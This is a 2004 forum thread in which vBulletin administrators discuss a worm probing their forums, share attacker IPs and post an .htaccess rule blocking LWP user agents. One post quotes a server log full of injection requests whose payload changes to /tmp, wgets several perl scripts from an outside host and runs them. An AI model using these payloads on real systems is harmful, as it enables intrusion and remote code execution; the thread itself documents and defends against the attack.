Tweet
To view the coding right click the broken image and save it to disk. Rename it giving it .txt extension and then open it in any text editor.
-
It is easy to block them. Put the code of the attachment into .htaccessStreicherComment
-
I'll try that on my site as I now have more then 650 worms trying to exploit my vB hahaComment
-
same happened to mine last night
server admin have sent me a full logg dont know if it is of any use
Please talk to vbulletin about the following security hole in their system intruder got in last night thru your site the following way and uploaded files to the temp dir and driving load on server up.
The vulnerability is in:
save-concorde.org.uk/forums/printthread.php?t=1134/showthread.php?
The hackers ip is 66.90.67.40, 64.191.63.149 etc
Code:########################### save-concorde.org.uk:64.191.63.149 - - [25/Dec/2004:09:03:27 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803" save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=1134/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803" save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11380 "-" "LWP::Simple/5.803" save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803" save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:02 -0500] "GET /forums/printthread.php?t=1229/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803" save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11383 "-" "LWP::Simple/5.803" save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET /forums/printthread.php?t=1229/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803" save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65" save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11383 "-" "LWP::Simple/5.65" save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65" save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET /forums/printthread.php?t=907/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65" save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:59 -0500] "GET /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65" save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:20:02 -0500] "GET /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
Last edited by Jerry; Sun 26 Dec '04, 9:49am.Comment
-
Your admin doesn't know what he's talking about, its a worm thats trying to attack ALL php script by attempting to pass a long string into ALL variables it can find, the problem is that on google vBulletin is the most popular php link so we're getting more attacks.
If something actually wrote something to the tmp directory then it wasn't from vBulletin.
Comment
-
Thank you, that fixed the problem for me. I don't have the worm/bots browsing the forums anymore.Originally posted by Streicher
meowComment
-
I've had these unusual bots going through just the archives of the forum and turned them off until I learned more. They all had user agents like lwp-trivial/1.41 or LWP::Simple/5.803
Here's a typical link they are hitting in the archives:
Comment
-
So they aren't actually a threat, as vBulletin is secure in this particular manner?
I hate having to use HTACCESS for anything much other than disabling directory viewing.
Alcar...Comment
-
what's happening is these worms are trying every variable they can find and attempting to exploit them Alcar.
the .HTACCESS is merely to jam up the bots from bombarding and overwhelming your server. It won't affect your users.ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online EntertainmentComment
-
Just an FYI for those who are blocking by IP, I caught these guys running around my site..
67.15.52.18
LWP::Simple/5.803
69.93.114.234
LWP::Simple/5.65
81.4.64.206
LWP::Simple/5.63
66.98.172.100
LWP::Simple/5.65
66.98.152.87
LWP::Simple/5.65
69.93.114.234
LWP::Simple/5.65ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online EntertainmentComment
-
Can't really be done by IP address since any exploited box will do it.
Yesterday morning when I saw it happening, I also blocked it with a quick .htaccess entry, which worked. In case anyone couldn't get it to work with the one posted for whatever reason, this is what I'm using:
Code:RewriteEngine on RewriteCond %{HTTP_USER_AGENT} ^LWP* [OR] RewriteCond %{HTTP_USER_AGENT} ^lwp* RewriteRule .* - [F]Sphinx Search for vBulletin 4: https://marketplace.digitalpoint.com...tin-4.870/item
Someone send me a message on Twitter when this site is usable again. https://twitter.com/digitalpointComment
-
Also see http://www.vbulletin.com/forum/showthread.php?t=124244
Several of us have been seeing this.Comment
-
Hmmm, so that's why our long standing(year and a half, or thereabouts) Most users ever online was broken yesterday. Saw a bunch of LWP'ers on WOL so I banned the lot.
Thanks for the info, all.Comment
-
i applied this and the bots are slowly but surely reducing in number.Originally posted by StreicherComment
-
Comment